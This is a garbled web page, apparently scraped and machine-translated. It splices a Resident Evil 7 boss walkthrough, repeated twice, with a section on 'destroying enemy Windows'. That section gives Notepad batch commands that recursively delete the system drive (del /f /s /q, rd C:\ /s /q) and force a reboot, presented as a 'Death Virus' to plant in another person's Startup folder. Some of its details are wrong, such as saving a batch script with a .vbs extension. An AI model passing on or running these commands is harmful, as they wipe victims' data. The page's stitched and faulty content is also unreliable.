Rename file windows 7 break break kill. How to kill Windows? Fast and forever. How to defeat Daddy Jack in the morgue

The Capcom series, like many other old franchises, is replete with various bosses. Almost everyone needs their own approach, and this is no exception.

Beware, spoilers! This article outlines how to defeat all the bosses in the game, and this knowledge may very well ruin the experience of fighting them yourself. It is recommended to resort to our help only if you absolutely cannot overcome difficulties.

Briefly about the bosses of Resident Evil 7

Before looking at each of the special opponents individually, it is worth talking a little about the general concept of passing the game.

Resident Evil 7 can be roughly divided into episodes, even if in the game itself there are no clear boundaries between stages. However, in each such conditional episode there is a final battle tied to one or another opponent.

In total, there are 6 special battles in the game, which stand out from the rest due to their complexity. Next, they will all be discussed in more detail. Once again, we warn you about spoilers!

How to defeat Miya in Resident Evil 7

The initial stage of the game takes place in a guest house, in the basement of which main character finds his beloved - Mia Winters. However, after five to ten minutes he attacks him with a knife.

After admiring the grin of the possessed Mia, wait until she throws Ethan against the wall. Then grab the ax lying on the right. Everything is quite simple here: you need to block Mia’s blow, and then immediately hit, and you can even do it without aiming.

After several blows to the head, the cutscene will start again, and the main character will hack his girlfriend to death with an ax. She will fall, but within a few moments she will disappear without a trace, and Ethan will only have to climb up to the attic to get out of the house.

Be sure to grab a pistol and ammo in one of the rooms, but don't waste it on breaking the boxes: there's nothing in them. Then start climbing the stairs, and then immediately back up, because Mia, armed with a chainsaw, will begin to crawl out towards you.

An ax won't help much in this case, so it's best to use a pistol. Try to shoot in the head, and after 7-8 hits it will lose consciousness.

How to defeat Daddy Jack in the garage

The head of the Baker family will become the second boss in Resident Evil 7, and three rather intense battles will be associated with him, the first of which will take place in the garage. The main character will go down there to meet the deputy sheriff.

Alas, Jack also decides to greet the guest, turning his head into a bloody mess. After this the battle begins.

Immediately grab the policeman's pistol, it lies next to his body. Then you can shoot Jack a little to make sure that he is not human at all. But don't delay: your task is to find the car keys. They lie near one of the walls.

Having obtained the treasured keys, carefully answer Jack somewhere away from the car, and then quickly run to it. Climb into the cockpit and enjoy another brutal cut-scene.

Of course, Jack will come to life again and head straight towards you immediately after the car lights up. This is where the gun comes in handy.

Aim for the head and keep a safe distance from your opponent. After he falls down, use the stairs to leave the garage.

How to defeat Daddy Jack in the morgue

The second fight with Jack Baker will take place in the basement of the processing area, where the head of the family cut up the corpses of those who could not be converted to his side. The space here is quite limited, so you need to act quickly, without cowering in a corner out of fear (this will be difficult at first!).

Shoot Jack in the head with a pistol or, if there are still bullets left, with a shotgun. If he comes too close, quickly run back to the opposite part of the “arena” or, if possible, kick hanging bags with corpses at him.

After suffering extensive heavy metal poisoning, Daddy will approach the illuminated corpse near the wall and remove a menacingly sized cleaver from it. Stop shooting immediately: you will no longer need cartridges, since now you can use a chainsaw near the same body against the wall.

After receiving a certain amount of damage, Jack will crouch on one knee and top part his body will begin to regenerate.

At these moments, you need to attack him without any pauses in order to cause as much damage as possible and not give the damaged parts of the body the opportunity to recover. After a while, the torso will burst and shower you with nasty mucus, but you won’t notice it: your victory over this reptile will make you so happy!

How to defeat Margarita in the greenhouse

It seems that after Ethan has already dealt with Jack twice, Mommy should not make up big problems. This is partly true, but only if you did not waste ammo and, if possible, ran through dangerous places.

Depending on the ammunition, the battle with Margarita will be either very easy or very difficult. One way or another, it will be divided into two phases.

At first, Margarita will try to set traps for you, waiting in the holes above. At this moment, you may have a deceptive sense of security, because you can shoot back while holding the defense in one of the parts of the greenhouse.

In fact, this is a trap: after a while, Margarita will begin to send a swarm of insects at you, which will not be so easy to deal with if you have little fuel in the burner.

Therefore, immediately try to behave aggressively: if Margarita is ambushed, then shoot in the head to lure her out, and at such moments shoot at the vile hive between her legs.

If you are assertive enough, Margarita will never take advantage of her little friends, but certain moment the hive will be spoiled, and then Mommy will fly into a rage and chase you on all fours!

This is the second phase, and it is also quite difficult, because the boss will move faster and attack more often. You need to retreat in time and make well-aimed shots to the head. When Margarita creeps too close, shoot with a shotgun - this way you will optimize the ammo consumption.

How to defeat the fat monster in the barn

Of course, you were probably expecting a fight with Lucas Baker, who by this point was already terribly tired of his “gags,” but instead you will have to fight with a huge fat monster.

The boss is not very difficult, but can cause problems if you don't know the tactics. After this black, slippery carcass falls out of the makeshift elevator, run to the stairs, where it’s most convenient to “meet” the boss.

Attack him when he starts to climb the stairs towards you. He may try to shower you with burning vomit, but in this case, just move back, and then you will be inaccessible to this attack.

When the fat man gets up, deftly sneak right in front of his nose and go down.

This way you will again gain a tactical advantage, and the fat guy will have no choice but to follow you sluggishly. Most likely, at this stage you will finish him off. If it turns out differently, just repeat the run up the stairs and down the stairs.

How to defeat Jack Baker at the pier

Do you miss Daddy? And he missed you too. Last time you injured him quite badly, so it took a lot of time to regenerate. Then now Jack Baker is simply unrecognizable!

He became much bigger and stronger, and the arena for fighting with him expanded and received an additional lower level.

The tactics of fighting the Jack monster have also changed, and are very reminiscent of Capcom’s favorite pastime - “shooting pimples.” To win, you need to shoot at the eyes, which are located in various parts of the boss's body.

Most of the eyes can be destroyed on the first level, just try to watch your step so as not to fall. At the same time, always keep an eye on Jack out of the corner of your eye: when he starts to swing, immediately change course and run back into the opposite side, otherwise you will have to spend “first aid kits”.

Some eyes are hidden in rather hard-to-reach places, and are easier to reach by shooting from the bottom up. Jump down and carefully watch your opponent's movements. As soon as the opportunity arises to shoot in the eye, do it immediately.

When the monster has no spare eyes left, a cutscene will begin, and then he will begin to destroy the arena, and then open his last eye. You need to shoot him too, and then Ethan will inject Jack with one of the two serum injections at hand, and he will crumble into many pieces. Jack is dead, now finished. Victory!

How to defeat Evelina in Resident Evil 7

This is the last boss in the game, but despite this, it is easier to defeat than the previous one. First you need to get to the girl. It will disturb you, creating sound waves that are hazardous to your health. Block them as you block all other attacks, and gradually get closer to your target.

When Ethan gets very close, he will grab Evelina and inject her with the serum, and then the girl will show her true colors. In fact, she has already aged and has accompanied the main character from the very beginning of the game in the guise of an old grandmother.

But this is only the beginning of the problems, because Evelina will naturally be “expanded” to immense proportions, and then she will have to use the most lethal weapon to win. I hope that you have something in store for such a case, because it will be extremely difficult to hide or dodge Evelina.

After you deal enough damage, the action moves to the courtyard, where Evelina will knock Ethan to the ground. You will have to shoot back from the available weapons, and the game will again not give you the opportunity to move and hide from the attack.

A few moments later, when you doomedly begin to reload, a box with a pistol will fall next to you, and they will shout at you from above to use it. Do it!

How to destroy enemy Windows?


The author of the article disclaims any responsibility for the unlawful use or distribution of the following. The information is provided for informational purposes only. Use it at your own risk. Try all the methods, preferably on a virtual machine.

Another trick with Notepad and a script for Windows. Although this time it cannot be called a trick - it is a real virus in its action. Such malware rarely circulates on the Internet. He will lead the enemy's system to collapse. I strongly recommend that you try this script on a virtual machine. Even better, don’t be lazy and install a fresh one on the newly created hard disk partition. operating system. In order to do so in the ways described.

How to destroy Windows. Option 1.

The essence of the code. It will destroy Windows system files and cause . So, we write the Death Virus. Here is the script syntax:

@echo off del %systemdrive%\*.*/f /s /q shutdown –r –f –t 00

Save this file with the .vbs extension anywhere. Before saving, do not close and go to next step. Replace the title Text Document with All files. The virus is launched by double-clicking or, as usual, from the Startup folder. After the system boots, the user will see a blue screen of death.

You can also try (instead of the second line) this command:

Del /f /s /q "C:\*.*"

Some files will refuse to be deleted because they may be used in this moment system. We'll remove what we can. The line will look like:

rd C:\ /s /q

As usual for such a folder, the script will not work when launched from Safe Mode.

After some thought and research, I decided to continue the article. Here are a few more scripts that will blow your enemy's system to smithereens.

How to destroy Windows. Option 2.

Let's write a bat file. As in all similar cases, open Notepad and enter the following code:

( @Echo off Del C:\ *.* |y )

Save in in the right place under any name, but with a required extension .bat. It will take time for the body file to “work.” The result will be erasing the data on drive C. To restore lost data, you will have to resort to the services of a specialized software or contact trained fighters. In any case, this is a waste of time and nerves. Sometimes a lot of money.

That's it for now. Use it correctly.

The Capcom series, like many other old franchises, is replete with various bosses. Almost everyone needs their own approach, and this is no exception.

Beware, spoilers! This article outlines how to defeat all the bosses in the game, and this knowledge may very well ruin the experience of fighting them yourself. It is recommended to resort to our help only if you absolutely cannot overcome difficulties.

Briefly about the bosses of Resident Evil 7

Before looking at each of the special opponents individually, it is worth talking a little about the general concept of passing the game.

Resident Evil 7 can be roughly divided into episodes, even if the game itself does not have any clear boundaries between the stages. However, in each such conditional episode there is a final battle tied to one or another opponent.

In total, there are 6 special battles in the game, which stand out from the rest due to their complexity. Next, they will all be discussed in more detail. Once again, we warn you about spoilers!

How to defeat Miya in Resident Evil 7

The initial stage of the game takes place in a guest house, in the basement of which the main character finds his beloved, Mia Winters. However, after five to ten minutes he attacks him with a knife.

After admiring the grin of the possessed Mia, wait until she throws Ethan against the wall. Then grab the ax lying on the right. Everything is quite simple here: you need to block Mia’s blow, and then immediately hit, and you can even do it without aiming.

After several blows to the head, the cutscene will start again, and the main character will hack his girlfriend to death with an ax. She will fall, but within a few moments she will disappear without a trace, and Ethan will only have to climb up to the attic to get out of the house.

Be sure to grab a pistol and ammo in one of the rooms, but don't waste it on breaking the boxes: there's nothing in them. Then start climbing the stairs, and then immediately back up, because Mia, armed with a chainsaw, will begin to crawl out towards you.

An ax won't help much in this case, so it's best to use a pistol. Try to shoot in the head, and after 7-8 hits it will lose consciousness.

How to defeat Daddy Jack in the garage

The head of the Baker family will become the second boss in Resident Evil 7, and three rather intense battles will be associated with him, the first of which will take place in the garage. The main character will go down there to meet the deputy sheriff.

Alas, Jack also decides to greet the guest, turning his head into a bloody mess. After this the battle begins.

Immediately grab the policeman's pistol, it lies next to his body. Then you can shoot Jack a little to make sure that he is not human at all. But don't delay: your task is to find the car keys. They lie near one of the walls.

Having obtained the treasured keys, carefully answer Jack somewhere away from the car, and then quickly run to it. Climb into the cockpit and enjoy another brutal cut-scene.

Of course, Jack will come to life again and head straight towards you immediately after the car lights up. This is where the gun comes in handy.

Aim for the head and keep a safe distance from your opponent. After he falls down, use the stairs to leave the garage.

How to defeat Daddy Jack in the basement

The second fight with Jack Baker will take place in the basement, where the head of the family cut up the corpses of those who could not be converted to his side. The space here is quite limited, so you need to act quickly, without cowering in a corner out of fear (this will be difficult at first!).

Shoot Jack in the head with a pistol or, if there are still bullets left, with a shotgun. If he comes too close, quickly run back to the opposite part of the “arena” or, if possible, kick hanging bags with corpses at him.

After suffering extensive heavy metal poisoning, Daddy will approach the illuminated corpse near the wall and remove a menacingly sized cleaver from it. Stop shooting immediately: you will no longer need cartridges, since now you can use a chainsaw near the same body against the wall.

After taking a certain amount of damage, Jack will crouch down on one knee and his upper body will begin to regenerate.

At these moments, you need to attack him without any pauses in order to cause as much damage as possible and not give the damaged parts of the body the opportunity to recover. After a while, the torso will burst and shower you with nasty mucus, but you won’t notice it: your victory over this reptile will make you so happy!

How to defeat Margarita in the greenhouse

It seems that after Ethan has already dealt with Jack twice, Mommy shouldn't pose much of a problem. This is partly true, but only if you did not waste ammo and, if possible, ran through dangerous places.

Depending on the ammunition, the battle with Margarita will be either very easy or very difficult. One way or another, it will be divided into two phases.

At first, Margarita will try to set traps for you, waiting in the holes above. At this moment, you may have a deceptive sense of security, because you can shoot back while holding the defense in one of the parts of the greenhouse.

In fact, this is a trap: after a while, Margarita will begin to send a swarm of insects at you, which will not be so easy to deal with if you have little fuel in the burner.

Therefore, immediately try to behave aggressively: if Margarita is ambushed, then shoot in the head to lure her out, and at such moments shoot at the vile hive between her legs.

If you are assertive enough, Margarita will never take advantage of her little friends, and at some point the hive will be ruined, and then Mommy will fly into a rage and chase you on all fours!

This is the second phase, and it is also quite difficult, because the boss will move faster and attack more often. You need to retreat in time and make well-aimed shots to the head. When Margarita creeps too close, shoot with a shotgun - this way you will optimize the ammo consumption.

How to defeat the fat monster in the barn

Of course, you were probably expecting a fight with Lucas Baker, who by this point was already terribly tired of his “gags,” but instead you will have to fight with a huge fat monster.

The boss is not very difficult, but can cause problems if you don't know the tactics. After this black, slippery carcass falls out of the makeshift elevator, run to the stairs, where it’s most convenient to “meet” the boss.

Attack him when he starts to climb the stairs towards you. He may try to shower you with burning vomit, but in this case, just move back, and then you will be inaccessible to this attack.

When the fat man gets up, deftly sneak right in front of his nose and go down.

This way you will again gain a tactical advantage, and the fat guy will have no choice but to follow you sluggishly. Most likely, at this stage you will finish him off. If it turns out differently, just repeat the run up the stairs and down the stairs.

How to defeat Jack Baker at the pier

Do you miss Daddy? And he missed you too. Last time you injured him quite badly, so it took a lot of time to regenerate. Then now Jack Baker is simply unrecognizable!

He became much bigger and stronger, and the arena for fighting with him expanded and received an additional lower level.

The tactics of fighting the Jack monster have also changed, and are very reminiscent of Capcom’s favorite pastime - “shooting pimples.” To win, you need to shoot at the eyes, which are located in various parts of the boss's body.

Most of the eyes can be destroyed on the first level, just try to watch your step so as not to fall. At the same time, always keep an eye on Jack out of the corner of your eye: when he starts to swing, immediately change course and run back in the opposite direction, otherwise you will have to waste “first aid kits”.

Some eyes are hidden in rather hard-to-reach places, and are easier to reach by shooting from the bottom up. Jump down and carefully watch your opponent's movements. As soon as the opportunity arises to shoot in the eye, do it immediately.

When the monster has no spare eyes left, a cutscene will begin, and then he will begin to destroy the arena, and then open his last eye. You need to shoot him too, and then Ethan will inject Jack with one of the two serum injections at hand, and he will crumble into many pieces. Jack is dead, now finished. Victory!

How to defeat Evelina in Resident Evil 7

This is the last boss in the game, but despite this, it is easier to defeat than the previous one. First you need to get to the girl. It will disturb you, creating sound waves that are hazardous to your health. Block them as you block all other attacks, and gradually get closer to your target.

When Ethan gets very close, he will grab Evelina and inject her with the serum, and then the girl will show her true colors. In fact, she has already aged and has accompanied the main character from the very beginning of the game in the guise of an old grandmother.

But this is only the beginning of the problems, because Evelina will naturally be “expanded” to immense proportions, and then she will have to use the most lethal weapon to win. I hope that you have something in store for such a case, because it will be extremely difficult to hide or dodge Evelina.

After you deal enough damage, the action moves to the courtyard, where Evelina will knock Ethan to the ground. You will have to shoot back from the available weapons, and the game will again not give you the opportunity to move and hide from the attack.

A few moments later, when you doomedly begin to reload, a box with a pistol will fall next to you, and they will shout at you from above to use it. Do it!

After firing three shots from an extremely powerful pistol named after the notorious Albert Wesker, admire Evelina's death, and then exhale: Resident Evil 7 is completed.

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